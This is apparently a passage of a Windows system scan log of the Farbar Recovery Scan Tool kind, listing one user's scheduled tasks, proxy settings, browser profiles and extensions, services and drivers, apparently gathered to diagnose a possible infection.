Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-24]
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-24]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-25]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S2 MBAMService; I:\windows programy\malware bytes\MBAMService.exe [9343840 2023-11-23] (Malwarebytes Inc. -> Malwarebytes)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
